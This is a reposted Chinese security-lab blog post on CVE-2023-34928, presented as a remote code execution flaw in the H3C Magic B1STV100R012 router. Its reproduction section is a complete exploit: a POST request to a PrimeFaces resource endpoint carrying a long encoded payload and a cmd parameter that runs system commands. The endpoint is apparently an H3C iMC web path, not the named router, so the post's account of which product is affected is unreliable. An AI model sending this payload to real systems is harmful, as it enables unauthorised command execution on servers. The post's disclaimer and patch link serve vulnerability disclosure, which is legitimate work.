H3C Magic B1STV100R012远程代码执行漏洞(CVE-2023-34928)

IoT 1年前 (2023) admin
575 0 0



网安引领时代,弥天点亮未来   





 

H3C Magic B1STV100R012远程代码执行漏洞(CVE-2023-34928)

0x00写在前面

本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
H3C Magic B1STV100R012远程代码执行漏洞(CVE-2023-34928)

0x01漏洞介绍

H3C Magic B1STV100R012是中国新华三(H3C)公司的一款无线路由器。 

H3C Magic B1STV100R012版本存在安全漏洞。攻击者利用该漏洞通过特制的POST请求进行命令执行(Rce)。

H3C Magic B1STV100R012远程代码执行漏洞(CVE-2023-34928)

0x02影响版本

H3C Magic B1STV100R012版本存在安全漏洞

H3C Magic B1STV100R012远程代码执行漏洞(CVE-2023-34928)

注:该漏洞利用存在高风险,谨慎操作。

H3C Magic B1STV100R012远程代码执行漏洞(CVE-2023-34928)










H3C Magic B1STV100R012远程代码执行漏洞(CVE-2023-34928)

0x03漏洞复现

1.部署漏洞环境访问

H3C Magic B1STV100R012远程代码执行漏洞(CVE-2023-34928)

2.对漏洞进行复现

  Poc (POST)

POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1Host: 127.0.0.1Content-Length: 1569Content-Type: application/x-www-form-urlencoded
pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=whoami

POST请求,响应存在漏洞

H3C Magic B1STV100R012远程代码执行漏洞(CVE-2023-34928)


H3C Magic B1STV100R012远程代码执行漏洞(CVE-2023-34928)

0x04修复建

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://www.h3c.com/cn/


弥天简介

学海浩茫,予以风动,必降弥天之润!弥天弥天安全实验室成立于2019年2月19日,主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子,也是民间组织。主要以技术共享、交流等不断赋能自己,赋能安全圈,为网络安全发展贡献自己的微薄之力。

口号 网安引领时代,弥天点亮未来


















H3C Magic B1STV100R012远程代码执行漏洞(CVE-2023-34928) 


知识分享完了

喜欢别忘了关注我们哦~


学海浩茫,

予以风动,
必降弥天之润!


   弥  天

安全实验室

H3C Magic B1STV100R012远程代码执行漏洞(CVE-2023-34928)

原文始发于微信公众号(弥天安全实验室):H3C Magic B1STV100R012远程代码执行漏洞(CVE-2023-34928)

版权声明:admin 发表于 2023年7月23日 下午12:20。
转载请注明:H3C Magic B1STV100R012远程代码执行漏洞(CVE-2023-34928) | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...